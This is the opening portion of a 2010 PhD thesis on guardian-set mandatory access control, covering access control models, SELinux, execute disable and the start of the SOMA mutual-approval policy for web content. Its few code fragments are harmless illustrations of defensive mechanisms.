Ph.D. Thesis
Security Mechanisms and Policy for
Mandatory Access Control in
Glenn Daniel Wurster
A thesis submitted to
the Faculty of Graduate Studies and Research
in partial fulfilment of
the requirements for the degree of
DOCTOR OF PHILOSOPHY
Carleton University
Ottawa, Ontario, Canada
© 2010, Glenn Daniel Wurster
Abstract

Computer security measures, policies and mechanisms generally fail if they are not understood and accepted by all parties involved. To be understood, many security mechanisms currently proposed require security expertise from multiple parties, including application developers and end-users. Unfortunately, both groups often lack such knowledge, typically using computers for tasks in which security is viewed at best as a tertiary goal. The challenge, therefore, is to develop security measures understood and accepted by non-experts.
We pursue measures which require little or no user expertise, to facilitate broad deployment among non-technical user bases. By reducing the requirement that end-users self-police applications, we reduce the chance of policy enforcement errors causing security exposures. The security measures discussed are also straightforward and intended to avoid reliance on security expertise among application developers. For example, restrictions imposed by an application's target run-time environment essentially remove development choices (thus removing dependence on the developer to make proper security choices).
We pursue measures designed to be suitable for deployment to large segments of the development community, to reduce the knowledge and adoption barriers that may otherwise arise. The security measures we propose provide protection by significantly restricting the operations that an application is allowed to perform.
To address issues related to malicious sites and dangerous interactions between sites, we discuss the joint work SOMA, a browser extension. SOMA enforces a security policy that limits interaction between web sites to those that are pre-approved by one or (optionally) both sites involved in any interaction.
SOMA can be incrementally deployed for incremental benefits, and selectively deployed to those sites for which tighter control over content sub-syndication is acceptable. To address rootkits and malware affecting the installation and integrity of binaries, we present three approaches: configd, bin-locking, and increased kernel protection. For each approach, we discuss the architecture, implementation and support required. These ideas are suitable for many types of end-user machines, including those running Linux and Windows. They do not require any centralized infrastructure. We discuss approaches which do not depend on either software developers or users to properly address software security.
Acknowledgements

First and foremost, I want to acknowledge my wife, Heather, for her love and support during the process of completing my doctorate. I also want to thank my parents for their many years of support and parental guidance.
My supervisor, Paul C. van Oorschot, was invaluable during the process of performing both the research as well as writing the resulting papers (and this thesis). His prompt responses and detailed critiques resulted in a much better end product. His wealth of security-related knowledge and insights was appreciated. I'm thankful for his ability to step back, pulling out the core elements of an idea and helping me express them clearly.
To those who reviewed this thesis, your help was much appreciated. Terri Oda, Douglas Paul and Heather Wurster, your comments helped make the final product that much better.
Thanks to the many colleagues in the Carleton Computer Security Lab who provided feedback during the course of the Ph.D. Their critiques and comments helped fine-tune ideas. Conversations with Mohammad Mannan, Julie Thorpe, David Whyte, Terri Oda, David Barrera, and Carson Brown helped solidify ideas into workable concepts.
To the anonymous referees who reviewed the papers submitted to conferences, I thank you for your constructive feedback. Peer-reviewed submission is one of the most important avenues for feedback, and your constructive comments were appreciated. To those on the thesis defence committee, I likewise thank you for your feedback.
I finally want to acknowledge funding received through an NSERC PGS D scholarship, as well as funding from NSERC ISSNet and Carleton University.
Introduction

In current computing environments, applications written by many different authors all co-exist, sharing physical resources which include the network and file-system. Protecting these applications against attacks (both network and file-system based) while allowing them to share physical resources is not a simple task, especially since some of the applications may be malicious. The sharing of physical resources between many different applications brings with it many security issues which need to be dealt with. While there are many people involved with computers on a daily basis, only a small number of them have the skills required to protect applications against attack. Two groups of individuals who have often been tasked with more security responsibilities than their abilities warrant are users and application developers.
As computers have become more widespread, users of all different skill levels with a variety of skill sets have started buying and interacting with them on a daily basis. The number of application developers has similarly exploded in recent years, with many of them also having different skill levels and specializing in specific areas. Developers can focus on mobile applications, data mining, web page development, game design, image processing or any number of other areas related to software development. Expecting every developer to be an expert in computer security is unrealistic. The developer has many goals and pressures which influence how they choose to spend their time when developing software. With security a tertiary goal (at best), we cannot depend on application developers to develop secure software. We believe that relying excessively on either users or application developers for security is ill-advised. As computers become more accessible to both developers and users, the level of knowledge which can be assumed has decreased.
The increased accessibility of computers has resulted in a situation where both users and application developers are using computers while not being familiar with all the details of the system. We believe this is a strength of modern computers, one which allows much broader deployment. With this strength,
however, comes a caveat: we can no longer assume in-depth knowledge by either group when it comes to properly securing a system. We focus in this thesis on several methods for better protecting applications on a system while not depending on either group to properly understand, implement, or respond to complex security mechanisms. We do this by restricting the damage an application can do when abused or compromised, to limit the consequences when security is breached (or, in the case of malware, we restrict the activities it is allowed to perform at all). Our restrictions do not depend on a security-aware user for policy enforcement, since the mechanisms we introduce are designed for computers owned and operated by non-expert users. Our aim is to restrict the damage a malicious application can do (either by design, or when the security of an application is compromised through a vulnerability); therefore, it is only natural that many of the protection mechanisms we discuss are designed to prevent applications from interfering with each other.
Segregation of Applications
The specific protection mechanisms we introduce can be classified based on the environment the associated application is designed to run in. In this thesis, we concentrate on developing protection mechanisms for two such environments: applications designed for desktops and those designed to be deployed as websites.
On the Desktop
In current computing environments, applications written by many different authors all coexist on disk, being installed at various times. Each application normally includes a number of program binaries and libraries, along with some associated data and configuration files. While the installation of a new application will normally not overwrite files previously installed by another application, permission is commonly granted to modify all binaries (although this is not generally understood by all end-users). Indeed, this raises a problem: any application or application installer running with sufficient privileges can modify any other application on disk. Application installers are routinely given these privileges during software upgrade or install (e.g., almost all installers run as administrator or root, giving complete access to the system). Some applications even run with administrator privileges during normal operation despite the best efforts and countless recommendations against this practice
over the years. Commonly running applications (including their installers) as administrator leads to a situation in which a single application can modify any other application's files on disk. Normally, applications do not use (or abuse) this privilege. Malware, however, does not traditionally respect the customs of normal software, and uses the ability to modify other binaries as a convenient installation vector. Already in 1986, the Virdem virus was infecting executables in order to spread itself. More recently, rootkits have used binary file modification in an attempt to hide.
One part of this thesis pertains to protecting an application's files on disk. We discuss two different protection mechanisms: Bin-Locking, which is designed to limit modifications to binaries on disk, and configd, which is designed to limit modifications by an application to other applications' file-system objects.
As a Website
Current web pages are more than collections of static information: they are a combination of code and data often provided by multiple sources, being assembled or run by the browser. The browser itself provides a very powerful environment for communicating with arbitrary web servers and running arbitrary web-based applications. External content fetched by a browser may be untrusted, untrustworthy, or even malicious. Such malicious content can initiate drive-by downloads, misuse a user's credentials, or even cause distributed denial-of-service attacks.
A common thread in misuse of the functionality provided by a browser is that the browser must communicate with web servers which would generally not be contacted during the normal execution of the web-based application. Those servers may be controlled by an attacker, may be victims, or may be unwitting participants. Whatever the case, information should not be flowing between the user's browser and these sites.
A second part of this thesis addresses restricting the exposure of web-based applications in an effort to reduce the effect of some of the most common web-based attacks. We detail and discuss the Same Origin Mutual Approval (SOMA) approach, which requires the browser to verify that both the site operator of the page and the third party content provider approve of the inclusion before any communication is allowed (including adding anything to a page).
From the above discussion, the doctrine which motivates our work is summarized by the following assumptions:
A1. The current approach of relying on the application developer to properly implement security policies that protect a system against attack is inappropriate, given that many developers are not experts in security (and indeed, some developers write malicious applications intentionally). Similarly, relying on an end-user to police security policies is unwise, given that many end-users are not educated in security.
A2. Applications written by different developers co-exist, sharing resources. While we focus on sharing of the file-system and Internet, the assertion holds true for other physical resources as well.
A3. Applications rely on an environment provided by some external third party. In the case of desktop applications, this is the OS vendor. Web applications similarly rely on both the web server they run on, as well as the browsers.
A4. Those creating an application environment can be relied upon to properly implement security mechanisms designed to protect applications operating in the environment from interfering with each other. We do not assume that those creating the application environment will be able to design new security mechanisms (the contribution of this thesis is in designing new security mechanisms specific to two environments).
Given the above assumptions, we hypothesize that there are approaches that can be taken for protecting applications that do not require end-users or developers to be security experts, and result in better overall application security. Given that both the system owner and application developer may not be relied upon to adequately protect applications, can appropriate mandatory access control mechanisms be developed to better protect applications? Our objective is to pursue this question, and if possible, design several mechanisms that result in better overall application security but require little end-user or developer security expertise. In pursuing this thesis, the research involved finding such mechanisms for both desktop applications, as well as web applications. A second goal of our work is to draw more attention to an under-explored subset of mandatory access control policies, which we call guardian and define in Section 2.3.
Main Contributions
In this thesis, we introduce four access control mechanisms, which impose additional limits on application software. These mechanisms (and the policy they enforce) are designed to be easy for an application developer to understand and work within. They are also designed to require minimal user involvement.
The specific mechanisms we introduce are:
1. Limiting Privileged Processor Permission - We consider in Chapter a policy for restricting the ability to run arbitrary code with privileged processor permission. We pull together pre-existing protection rules and introduce new protection rules designed to separate root from kernel-level privileged processor control on a desktop system. In doing so, we provide a basis for positively answering the thesis question. The protection mechanism resulting from combining the rules does not assume any additional security knowledge by end-users, satisfying the constraints of our thesis question. In separating user from kernel level processor control, we also protect uneducated users from operations that can result in file-system data loss. We implement the protection mechanism on a prototype system, evaluating both its performance and ability to protect against current rootkit malware.
2. Bin-Locking - We consider in Chapter the problem of operating system and application binaries on disk being modified by malware. We present a new file-system protection mechanism designed to prevent the replacement and modification of binaries on disk while still allowing authorized upgrades. We use a combination of digital signatures and kernel modifications to restrict replacement without requiring any centralized public key infrastructure. Such an approach affirmatively answers the thesis question. To explore the viability of our approach, we implement a prototype in Linux, test it against various rootkits, and use it for everyday activities. The system is capable of protecting against rootkits currently available while incurring minimal overhead costs. We do not protect configuration files, instead focusing on protecting binaries the user does not modify. Configd addresses the protection of configuration files.
3. Configd - In Chapter we address the problem of restricting root's ability to change arbitrary files on disk in order to prevent abuse on most current desktop operating systems. The approach involves first recognizing and then separating the ability to configure a system from the ability to use the system to perform tasks. The permission to modify configuration of the system is then further subdivided in order to restrict applications
from modifying the file-system objects of other applications. We explore the division of root's current ability to change arbitrary files on disk and discuss a prototype that proves the viability of the approach. The novelty in the approach comes from being able to protect, on a desktop used by non-experts, an application's file-system objects on disk. The approach affirmatively answers the thesis question.
4. SOMA (joint work)1 - In addition to the main contributions of this thesis, we also discuss and expand on SOMA. Unrestricted information flows are a key security weakness of current web design. The SOMA approach as discussed in Chapter fits well with our thesis goal of better protecting applications from attack, without relying on expertise on the part of either the system owner or application developer. By requiring site operators to specify approved external domains for sending or receiving information, and by requiring those external domains to also approve interactions, we prevent page content from being retrieved from malicious servers and sensitive information from being communicated to an attacker. SOMA is compatible with current web applications and is incrementally deployable, providing immediate benefits for clients and servers that implement it. SOMA does not depend on the web application developer or browser user for proper enforcement, satisfying the constraints of the thesis question.
Many parts and ideas contained in this thesis have been peer-reviewed. These publications are listed below in chronological order.
1. G. Wurster, P. C. van Oorschot. Self-Signed Executables: Restricting Replacement of Program Binaries by Malware. In Proc. 2007 Workshop on Hot Topics in Security (HotSec), August 2007.
• Chapter details the contents of this paper.
2. G. Wurster, P. C. van Oorschot. The Developer is the Enemy. In Proc. 2008 Workshop on New Security Paradigms, September 2008. pp. 89-97.
1 The SOMA work appeared first in a paper published with another Ph.D. student co-author. The author of the present dissertation contributed the idea of isolating applications. Terri Oda contributed domain-specific knowledge required to make the approach feasible when applied to web applications.
• This workshop paper explored the subject of not trusting developers to always make proper security choices. While we do not incorporate it in its entirety within the thesis, at a high level the thesis draws on concepts introduced in this work. In this thesis, we treat the developer as being unable to properly make security-related decisions.
3. T. Oda, G. Wurster, P.C. van Oorschot, A. Somayaji. SOMA: Mutual Approval for Included Content in Web Pages. In Proc. 15th ACM Conference on Computer and Communications Security, October 2008. pp. 89-98.
• Chapter details and expands on the contents of this paper.
4. G. Wurster, P. C. van Oorschot. System Configuration as a Privilege. In
USENIX 2009 Workshop on Hot Topics in Security (HotSec), August 2009.
• Chapter details the contents of this paper.
In addition, this thesis presents additional work not yet published in a peer-reviewed journal or conference.
1. G. Wurster, P. C. van Oorschot. A Control Point for Reducing Root Abuse
of File-System Privilege. Under submission to conference.
• Chapter details the contents of this paper.
2. G. Wurster, P. C. van Oorschot. Towards Reducing Unauthorized Modification of Binary Files. Technical Report TR-09-07, Carleton University, September 2009. Under submission for journal publication.
• Chapters and detail the contents of this paper.
In Chapter we provide background on mandatory access control policies, including several which have already been deployed. We concentrate on how each of the MAC policies is enforced, focusing on the demands placed on both the user and application developer. In Chapter we discuss SOMA, an approach for better isolation of applications which have been developed for the
web (i.e., the application relies on both a web server and web browser communicating over the same network). Chapter introduces additional enforcement mechanisms which limit any application's ability to gain privileged processor control. Such protections are used in Chapter which introduces an approach for limiting updates to files based on whether the update can be verified based on data contained in the already-installed file. Chapter uses the mechanisms discussed in Chapters and to protect file-system objects belonging to an application from being modified by other applications on the system. We provide a summary of the approaches in Chapter , revisiting the thesis hypothesis and questions.
Overview

In this chapter, we provide an overview of access control policies and related mechanisms as they relate to this thesis. We start our discussion by examining the role of a system administrator in securing the environment they are placed in charge of. We then discuss the various types of access control policies, along with how they can be enforced. We also present several access control mechanisms that fall into the same category as those presented in this thesis.
A System Administrator Analogy
The job of a system administrator involves conflicting goals. They must provide support to the users in a particular environment while keeping that environment secure. This involves ensuring that all tools users require to get their job done are available while at the same time not allowing the users to customize their systems to the point that they become vulnerable to attack. Furthermore, administrators usually prefer to keep the environment identical amongst all of the computers they are maintaining to reduce maintenance overhead. The good system administrator will leave the computers in such a state that users do not feel restricted in how they perform their tasks, but at the same time maintain control over the system in order to combat malware. The job is made harder by the fact that many users are not security experts themselves, and consequently may do things that undermine the security of the system.
This situation, the continual balance between the goals of the user and the goals of the system administrator, can be parallelled in the software development world.
In such an environment, users become the software developers and system administrators are those that create the environment used by developers. This can either be the software development environment or the run-time environment of the developed software. Stray too far toward giving the developers total control of the systems they are developing for and the security of the system
will suffer as a result. Stray too far toward limiting developers, and they will likely flee from the environment, preferring instead something potentially less secure but more usable. Most software developers are not security experts and so, like standard users, may do things that will undermine the security of the resulting system. In reality, both users and software developers are attempting to get their job done, and security is often not a primary task.
If we examine the security mechanisms that have been applied to users versus those that have been applied to developers, we see a large discrepancy. While we have been attempting to enforce many security policies on a user (e.g., password strength), many of the security policies have not been enforced upon developers (e.g., buffer overflow detection), instead being offered as an option developers can choose to use. Developers, not surprisingly, are unlikely to choose the security option unless some other external influence also exists to make the choice to change their behaviour/routine more appealing. How do we increase the security of our system? We convince developers to exchange current unsafe approaches for safer ones.
It is commonly said that we are creatures of habit. We have preferred ways of doing things and breaking a habit can be an arduous task. Individuals also prefer to stick with what they know. As a developer, we prefer to use tools, technologies, and approaches with which we are familiar. This is especially the case when we are placed under stress (e.g., not having time to learn new approaches). For this reason, the thesis concentrates on security mechanisms that are simple for both the application developer and the end user. We pursue measures that require little or no user expertise, to facilitate broad deployment among non-technical user bases. By reducing the requirement that end-users self-police applications, we reduce the chance of policy enforcement errors causing security exposures. By reducing required developer knowledge and hence adoption barriers, we facilitate use by large segments of the development community. Approaches either fly or die based on whether they are picked up by the general community, so making deployment as easy as possible is critical.
Access Control Types
We now discuss necessary background related to security mechanisms and the policies they enforce. There are several different types of access control, differentiated by who is in control of permissions related to the elements being protected by an access control mechanism. The taxonomy is illustrated in Figure 2.1.
Figure 2.1. A taxonomy of types of access control. We build on the generally accepted taxonomy of access control by further subdividing the class of mandatory access controls based on who is responsible for setting policy.
Discretionary Access Control
Under a discretionary access control method, an individual who owns an object can either allow or deny access by others to the object. One example of this is the typical POSIX access controls on Unix, where the owner of a file is allowed to set read, write, and execute access for other members of the group and everyone else.
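As a small illustration of this discretionary control, the following sketch (using Node.js's built-in fs module; the file name and permission bits are chosen for the example, not taken from the thesis) shows a file owner granting itself read and write access, its group read-only access, and everyone else nothing:

    const fs = require('fs');

    // Owner: read/write; group: read-only; others: no access (octal 640).
    fs.chmodSync('report.txt', 0o640);

    // Confirm the permission bits the owner just set at their own discretion.
    const mode = fs.statSync('report.txt').mode & 0o777;
    console.log(mode.toString(8)); // prints "640"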
Originator Controlled Access Control
Under originator controlled access control, the ability to access an object is controlled by the creator of the object. A common example of such an approach is digital rights management in digital media, where the creator attempts to retain control over access to the work after it is distributed to the buyer. Bin-locking (Chapter ) comes close to being such an approach,
because the creator is capable of restricting updates based on the selection of keys embedded into the file. In reality, however, bin-locking is best thought of as a hybrid between mandatory and originator controlled access control.
Mandatory Access Control
Under a mandatory access control, access policy for an object is set by an individual other than the owner or creator of the object. Such a policy is enforced through one or more security mechanisms that exist on the system. The user, even if they own the object, cannot change the mandatory access control policy for that object. Processes that run for the user cannot modify the policy either.
Typically, policy is set by another individual (or the same individual assuming a different role). In this thesis, we sub-divide the field of mandatory access control based on who is responsible for setting policy.
Policy set by System Owner
In this environment, the mandatory access control policy is controlled by the owner of a system (often the system administrator). If the equipment is part of a company, then either the IT department or management is typically responsible for setting policy. In home environments, the owner and system administrator are typically one and the same. It is assumed that the system administrator is capable of setting the correct mandatory access control policy and properly implementing the underlying policy mechanisms required to enforce the policy.
Policy set by System Developer
In this environment, the mandatory access control policy (and deployment of related mechanisms) is set by the developer of the software or hardware. One reason these policies may be enforced by the developer is to limit damage to either the hardware or software (e.g., software's ability to control the refresh rate in CRTs is limited to prevent damage due to incorrect refresh rates). Other policies may be imposed by the developer to prevent software vulnerabilities such as buffer overflows (e.g., limiting the size of a string which can be processed by the software).
Policy set by a Guardian
While the system administrator or developer in charge of the mandatory access control policy may have sufficient knowledge to properly set policy, there is also a chance they will not. This is, in fact, a common criticism against SELinux.
For this reason, we introduce a third category for how mandatory access control policies can be set: by a guardian. In this enforcement approach, the policy is set by someone who is knowledgeable in setting appropriate policy in order to secure a system (developers and system administrators can be included in this category as long as they are capable of properly setting the security policy and related enforcement mechanisms). Guardian-set policies are designed to protect individuals who are less aware, and to be administered by those who are more aware, of threats inherent in the particular system.
An example of guardian enforced mandatory access control is the parental controls embedded into many media players and video game consoles. Parental controls do not place control of content in the hands of content creators or developers, nor directly into the hands of the system owner (who may be a child in the case of a video game unit). Rather, they are designed to put control into the hands of the parents, who are capable of making informed decisions about the risks and benefits in a particular environment. Parents are assumed to be sufficiently aware of the dangers of age-inappropriate material to make informed decisions about the content to restrict.
SELinux can be shifted to a guardian enforcement approach by having a central repository of policies, maintained by experts, which can be drawn from in protecting a particular system. Recent advancements in SELinux take this approach.
Information Policy Taxonomy
The various policies for controlling the flow of information are illustrated in Figure 2.2. Policies generally fall into one of three categories: focusing on the integrity of information, the secrecy of information, or some combination of the two. For those policies focused on integrity, the goal is to prevent modifications which reduce the integrity of the information (i.e., modifications which make the information incorrect or unreliable). For secrecy-based policies, the goal is to prevent the information from being disclosed to those not authorized to view it.
Hybrid policies combine aspects of both integrity and secrecy based information policies. The Chinese wall policy includes elements from both the integrity and confidentiality policies. It helps prevent conflict of interest in the financial world.
Figure 2.2. A taxonomy of access control policies.
Bell-LaPadula Security Model
In the Bell-LaPadula model, a set of labels is created that define the sensitivity level of the information associated with each particular label. The typical example of such an ordering is 1) unclassified, 2) confidential, 3) secret, and 4) top secret. Any piece of information labelled top secret would be strictly more sensitive than information labelled confidential. In such a system, each end-user is also assigned a clearance, indicating what level of information they are allowed to access. In our example, we consider an individual, Heather, who is granted secret clearance.
Heather is allowed to read all information classified as secret, as well as information classified as confidential or unclassified (i.e., she can read down). Furthermore, Heather is also allowed to write to information with higher classifications (i.e., she can write up). In allowing Heather to write up, she can communicate information to those who may have higher clearance levels, but is prevented from leaking information to those who do not have as high a clearance level. In the Bell-LaPadula system, content assigned to a specific security level can never be leaked to a lower security level.
The simplistic model of read down, write up is not sufficient to protect higher level information from being corrupted, because anyone is capable of modifying top secret information, even though they will not be able to view it. For this reason, additional discretionary restrictions are placed on the ability to read and write content. The Bell-LaPadula model therefore combines both discretionary and mandatory access control policies.
Biba Integrity Model
In the Biba integrity model, the system is designed to preserve the integrity of objects on the system. Similar to the Bell-LaPadula model, each piece of information is assigned a security level, and principals in the system are assigned clearances. In contrast to Bell-LaPadula, however, the focus is on integrity as opposed to secrecy. In Bell-LaPadula, Heather was allowed to write to content at a higher secrecy level and read from content at a lower secrecy level. In Biba, Heather would be allowed to do the opposite – read content at a higher integrity level and only write to content at a lower integrity level. In this way, content with high integrity can only be modified by principals who have permission to write to these objects, even though it can be read by everyone. The restrictions on read are enforced to prevent someone with permission to modify high integrity data from incorporating low integrity data into high integrity data.
The write down aspect of Biba is similar to the POSIX model of root being
able to write to all files on disk and users being only able to read the files.
A difference, however, is that root is also allowed to read all files on disk, an action not allowed by the Biba integrity model.
As with the Bell-LaPadula model, it is possible to add additional discretionary access control policies on top of the base Biba model to further restrict operations on the system (e.g., you may not want everyone to be able to read all information designated as higher integrity). As long as the mandatory access controls of Biba are not broken, system integrity is assured.
Clark-Wilson Integrity Model
The Clark-Wilson integrity model concentrates on the transactions (or transaction procedures - TPs) that can be performed on an object. In their model, the system state must be consistent before and after each transaction (each transaction is composed of one or more operations that, if run individually, could leave the system in an inconsistent state). In this model, the elements that must stay consistent are considered constrained data items (CDIs). After the CDIs are verified as initially being consistent by an integrity verification procedure (IVP), one can be guaranteed that any allowable transaction will leave the CDIs in a state which is also verifiable using the IVP. In order to maintain integrity, only verified TPs are allowed to run, and each verified TP can only be run by a user with sufficient permission (i.e., each user is specified as having a set of allowable TPs that they can run). Additional requirements are imposed to enforce separation of duty, user authentication, and sufficient logging of actions.
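The enforcement side of the model can be summarized by a small sketch. The code below is a simplification and not from the thesis: the certified TP, the CDI, and the (user, TP, CDI) authorization triple are invented names used only to show the two checks (the TP must be certified, and the user must be authorized to run that TP on that CDI).

    // Invented example data: one certified transaction procedure and one triple.
    const certifiedTPs = new Set(['postTransaction']);
    const allowedTriples = new Set(['heather:postTransaction:accountLedger']);

    function mayRun(user, tp, cdi) {
      // Only certified transaction procedures may operate on constrained data items.
      if (!certifiedTPs.has(tp)) return false;
      // The user must be authorized for this particular TP on this particular CDI.
      return allowedTriples.has(user + ':' + tp + ':' + cdi);
    }

    console.log(mayRun('heather', 'postTransaction', 'accountLedger'));    // true
    console.log(mayRun('heather', 'editLedgerDirectly', 'accountLedger')); // false: uncertified TP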
Related Access Control Mechanisms
In this section, we discuss several access control mechanisms related to the work in this thesis.
SELinux

Given that most of the security mechanisms discussed in this thesis are for Linux, we would be remiss if we did not discuss SELinux. SELinux provides both an enforcement mechanism and an associated specification language for deploying a mandatory access control policy. The specification language is based on three elements: subjects, objects, and actions. Subjects are the actors (running processes) on the system. They are allowed to perform certain actions on specific objects. The enforcement mechanism used in SELinux relies on being able to determine whether the subject is authorized to perform a specific action on an object based on a table look-up. Such an approach is capable of being used for type enforcement, role based access control (RBAC), multi-level security (MLS) and additional discretionary access control (DAC).
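The table look-up at the heart of the enforcement mechanism can be pictured with the following sketch. This is only a conceptual model written for this discussion: the subject and object type names are illustrative, and the set-of-strings encoding is not SELinux's actual policy language or data structure.

    // Each entry allows one (subject type, object type, action) combination.
    const allowRules = new Set([
      'httpd_t:httpd_config_t:read',
      'httpd_t:httpd_log_t:append',
    ]);

    function allowed(subjectType, objectType, action) {
      // The access decision reduces to a single table look-up.
      return allowRules.has(subjectType + ':' + objectType + ':' + action);
    }

    console.log(allowed('httpd_t', 'httpd_config_t', 'read')); // true
    console.log(allowed('httpd_t', 'shadow_t', 'read'));       // false: no matching rule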
The base NSA SELinux system falls into the category of mandatory access control policies that are specified by the system administrator. With the introduction of policies created by experts and distributed by a central authority, the implementation switches to a guardian style of access control enforcement. The complexity of SELinux has greatly limited its deployability to date, resulting in the system being used in very limited contexts and with expert users. The approach of having guardians (instead of end-users) create SELinux security policies has seen broader deployment.
While this thesis introduces new protection mechanisms, SELinux has a fixed protection policy (an access control matrix) and allows the labelling of subjects and objects to vary. The difference is subtle but important. As flexible as SELinux security policy is, some protection mechanisms discussed in this thesis are not easily described using the specification language of SELinux, including SOMA, bin-locking, and configd. SOMA exists in a different application environment, bin-locking allows the creator of the application binary to allow or deny replacement, and configd applies to installers, which are not likely to have a SELinux policy present on the system (or if they do have policy, it is very permissive).
JavaScript Same Origin Policy
The JavaScript same origin policy is designed to limit the ability of JavaScript to read from and write to content retrieved from a different origin. It is another example of mandatory access control policy being set by a guardian. Policy and mechanism are both set by the browser manufacturers, not web developers or users. We discuss the JavaScript same origin policy in detail in Section
In contrast to SELinux, the JavaScript same origin policy is simple. Also in contrast to SELinux, the same origin policy enjoys widespread deployment and use amongst non-technical users (most of whom don't even know it is in use). Its relatively simple fixed policy and lack of user involvement in enforcement are some of its greatest strengths.
The Apple Application Marketplace
The procedure for loading an application on many of Apple's devices (including the iPod, iPhone, and iPad) currently involves having the application developer submit their application to Apple for verification before it is made available for download from the application market (a similar approach was previously used in Symbian phones). Users may only download and install applications from the market. The Apple application marketplace is another example of a mandatory access control policy being set by a guardian, where security decisions are made by Apple as opposed to either the developer or the end user. While most other approaches assume a user with physical possession of the device (and sufficient know-how) can ultimately modify the mandatory access control mechanism, Apple attempts to prevent those in physical possession of the device from disabling or otherwise modifying the protection mechanism.
The approach taken by Apple falls into the class of mandatory access control
policy being set by a guardian, similar to those presented in this thesis. In this thesis, however, we choose not to attempt to protect against physical attacks, leaving open the possibility that the user in physical possession of the device (and sufficient technical know-how) may disable the mandatory access control.
Characteristics of Policies Presented
The policies and related security mechanisms discussed in this thesis fall into the category of mandatory access controls that are set by a guardian (recall Figure 2.1), being controlled in such a way that we hope decisions are made by those educated and capable of choosing appropriately. In addition, the security mechanisms discussed in this thesis have two additional attributes:
1. They involve little or no user involvement for their enforcement.
2. They have a low adoption barrier for developers who must abide by them
in their software applications.
We further define the guardian set mandatory access control policies discussed in this thesis by incorporating desirable aspects from parenting – tenderness and firmness. In rearing good computer users and developers, we follow the same approach of being tender (by providing an environment which is constructive rather than adversarial) and being firm about the boundaries that cannot be crossed (to provide greater protection against security risks). For users especially, having the policy be set by a guardian helps the user avoid harm even though they may not fully appreciate the risks (similar to how parents protect children from unknown dangers). In such a system, applications (and the developers who create them) are likewise not given full trust. Firm limits which prevent various dangerous activities are imposed in the interest of protecting users, applications, and the environment they run in. In another analogy to parenting, the protection mechanisms should not be overly restrictive or those affected may rebel.
The security mechanisms discussed in this thesis are designed to be applied to individuals less aware of, and administered by those more aware of, the dangers inherent in the particular system: for desktop applications, the administrators include the OS designers, and for web applications, the browser vendors and web server administrators. Those developing content must abide by the policy set by the guardian (the OS designer, browser vendor, or server administrator) in order to be accepted on the system.
Execute Disable as an Example Mechanism
Execute disable blocks a processor from running binary code from a page in memory unless the page has been marked as executable in the page table. This feature is implemented on most modern processors in an effort to protect against code injection buffer overflow attacks. The execute disable bit is
implemented in hardware, enforced by the processor, activated by the operating system, enforced in all applications, and virtually hidden from users.
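The decision the hardware makes can be modelled with a short sketch. The real check is performed by the processor on instruction fetch, driven by a no-execute bit in the page-table entry; the JavaScript below is only a conceptual model of that decision, with invented page contents.

    // A toy page table: one code page and one writable data page (e.g., the stack).
    const pageTable = [
      { writable: false, executable: true },   // page 0: program code
      { writable: true,  executable: false },  // page 1: data; injected code would land here
    ];

    function fetchInstruction(pageIndex) {
      if (!pageTable[pageIndex].executable) {
        throw new Error('execute-disable fault: page ' + pageIndex + ' is not executable');
      }
      // ...decode and run the instruction...
    }

    fetchInstruction(0); // fine: fetching from the code page
    try {
      fetchInstruction(1); // attacker-injected code on the data page is refused
    } catch (e) {
      console.log(e.message);
    }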
The introduction of execute disable as a method for combating code injection vulnerabilities is also an example of a new mandatory access control mechanism being introduced by a guardian into an already established software ecosystem. It was introduced in the Windows environment with the release of service pack 2 for Windows XP. While initially the approach was an opt-in one, it is enabled for all 64-bit applications. Linux has also introduced execute disable functionality. The successful introduction of execute disable gives evidence that it is possible to add new mandatory access controls into an already deployed system (although some introductions require changes to existing applications).
The ability to both execute and write to data on the same page is a feature that is not commonly used by most developers. Most compilers automatically store data on different pages of memory than code. Applications are generally not negatively affected by the introduction of execute disable (e.g., Arjan van de Ven indicated no applications were broken by the enabling of execute disable in Fedora Core 1).
The execute disable bit does have its limitations; namely, it is not able to prevent data from being executed when the data is located on the same page as code. Also, it is not able to protect against the modification of data or return-into-libc attacks. The simplicity of the approach, however, has led to its widespread acceptance in spite of the deficiencies. While many other solutions to the problem of code injection attacks have been proposed, execute disable continues to be the most popular method because of its simplicity and broad support.
The introduction of execute disable into modern desktop operating systems and its enforcement on all applications running on the system are the properties we are seeking for the new access control policies introduced in this thesis. Execute disable increased the security of the overall system because it was widely deployed, did not depend on each developer to selectively enable the feature, and did not depend on the user to understand and administer the protection mechanism. It is therefore a good example of the types of parental style guardian enforced mandatory access control mechanisms which are discussed in this thesis.
Execute disable does not prevent all buffer overflow attacks that can occur, but the combination of it with other approaches, such as address space layout randomization (ASLR), has made exploiting a buffer overflow much more difficult for an attacker. ASLR, like the execute disable bit, is controlled by the operating system and enforced on applications.
The mechanisms introduced in this thesis are designed to be set by a guardian.
They are designed to be enforced by those designing the environment that applications will run in. They are also designed to be applicable to environments where the user may not be a security expert. As evidence that guardian enforced mandatory access control mechanisms can be deployed into pre-existing environments, we discussed execute disable in Section
Same Origin Mutual Approval Policy
In this chapter, we present and build on the Same Origin Mutual Approval policy (SOMA), joint work developed to restrict the fetching of web content. Following in the style of parental style guardian mandatory access control policies, the approach does not rely on user interaction and imposes additional restrictions on all developers creating web applications. SOMA is designed to limit the current promiscuous nature of the Internet, preventing a number of attack vectors which are currently exploited by web malware. We build on the joint work by providing a comprehensive description of current web attacks, and discussing extensions to the core approach.
The current web environment consists of millions of servers distributed throughout the globe serving content to hundreds of millions of users worldwide. For most users, a web browser is used to fetch various pieces of content and combine them together into a web page as viewed by the user. As an example, Figure 3.1 illustrates a simple base web page. It is comprised of a number of different objects, including a graphic, text, a style declaration (which affects how the page is displayed), and JavaScript (not visible). The source is shown in Figure 3.2.
In loading a web page, the browser will first fetch a base HTML (HyperText Markup Language) page from a web server. The base page can then refer to additional files that need to be loaded in order for the page to be fully rendered to the user by the browser. The web browser will fetch all extra objects referenced by the base page as part of the process of loading the page. In the example code of Figure 3.2, this includes fetching an image (line 11), a JavaScript source file
Figure 3.1. A sample web page including a graphic.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<title>Yes?</title>
<link rel="stylesheet" href='style.css' type="text/css" />
<p>I am an <span class="blink">ugly webpage</span>, yes I am!
<img alt="" src='face.png' width="400" height="100" /></p>
Figure 3.2. Source code for a sample web page including a graphic.
